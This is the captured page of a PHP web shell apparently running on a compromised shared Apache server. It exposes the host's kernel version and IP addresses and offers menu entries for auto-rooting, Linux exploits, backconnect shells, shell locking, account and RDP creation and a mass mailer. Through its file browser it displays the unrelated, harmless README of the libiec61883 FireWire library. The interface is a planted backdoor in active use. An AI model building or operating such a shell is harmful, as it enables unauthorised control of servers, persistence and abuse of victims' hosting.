Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libiec61883-0 /
[ HOME SHELL ]
Name
Size
Permission
Action
NEWS.gz
998
B
-rw-r--r--
README
2.01
KB
-rw-r--r--
changelog.Debian.gz
1.58
KB
-rw-r--r--
copyright
1.42
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README
libiec61883 README Copyright (C) 2004-2005 Kristian Hogsberg, Dan Dennedy, and Dan Maas. http://www.linux1394.org/ Overview -------- This library is an implementation of IEC 61883, part 1 (CIP, plug registers, and CMP), part 2 (DV-SD), part 4 (MPEG2-TS), and part 6 (AMDTP). Outside of IIDC, nearly all FireWire multimedia devices use IEC 61883 protocols. The libiec61883 library provides a higher level API for streaming DV, MPEG-2 and audio over Linux IEEE 1394. This includes both reception and transmission. It uses the new "rawiso" API of libraw1394, which transparently provides mmap-ed DMA for efficient data transfer. It also represents the third generation of I/O technology for Linux 1394 for these media types thereby removing the complexities of additional kernel modules, /dev nodes, and procfs. It also consolidates features for plug control registers and connection management that previously existed in experimental form in an unreleased version of libavc1394. Requirements ------------ Linux kernel 2.4.20 or newer libraw1394 1.2.0 or newer Documentation ------------- Nearly everything is documented in the header file. The comments from the header can be extracted and formatted using the Linux kernel script, e.g.: /usr/src/linux/scripts/kernel-doc -man src/iec61883.h | nroff -man | less Pkg-Config ---------- The library comes with a pkg-config .pc file, so you can check for libiec61883 and its version in your configure script. For example, here is how to use the autoconf macro: PKG_CHECK_MODULES(LIBIEC61883, libiec61883 >= 1.0.0) This macro sets the variables LIBIEC61883_CFLAGS and LIBIEC61883_LIBS. You have to include those into your build variables so that the build process correctly links with libraw1394. Maintainer ---------- Maintainer of libiec61883 is currently Dan Dennedy. Send suggestions, bug reports and fixes to linux1394-devel@lists.sourceforge.net. See the file AUTHORS for a complete list of contributors to libiec61883. Visit http://www.linux1394.org/ for more information or to see what is new.
Close